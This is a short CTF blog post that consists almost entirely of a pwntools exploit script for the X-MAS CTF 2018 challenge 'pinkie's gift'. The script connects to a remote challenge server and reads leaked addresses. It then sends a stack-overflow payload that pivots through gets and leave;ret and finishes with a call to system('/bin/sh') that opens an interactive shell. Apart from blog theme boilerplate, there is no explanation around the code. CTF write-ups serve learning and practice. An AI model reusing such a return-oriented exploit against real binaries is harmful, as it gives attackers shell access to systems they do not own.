xmasctf

Word count: 117 / Reading time: 1 min

 2018/12/15   Share

pinkie’s gift

from pwn import *

debug = int(raw_input("debug?:"))

if debug:
    p = process("./pinkiegift")
    context.log_level = "debug"
else:
    p = remote("95.179.163.167", 10006)

p.recvuntil("Santa: ")
binsh = int(p.recvn(9), 16)
system = int(p.recvn(11)[1:], 16)
print "binsh:", hex(binsh)
print "system:", hex(system)

p.sendline("nihao")
p.recvuntil("nihao\n")

gets_address = 0x080483d0
leave_ret = 0x08048607
payload = "a" * 0x84 + p32(binsh) + p32(gets_address) + p32(leave_ret) + p32(binsh + 4)
p.sendline(payload)
payload2 = p32(system) + "ls;a" + p32(binsh + 16) + "/bin/sh"
p.sendline(payload2)
p.interactive()

原文作者: Tianji

原文链接: https://www.tiandiwuji.top/posts/49664/

发表日期: December 15th 2018, 1:58:07 pm

Next Post

内存取证分析
Previous Post

hxp-ctf

CATALOG

1. pinkie’s gift



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true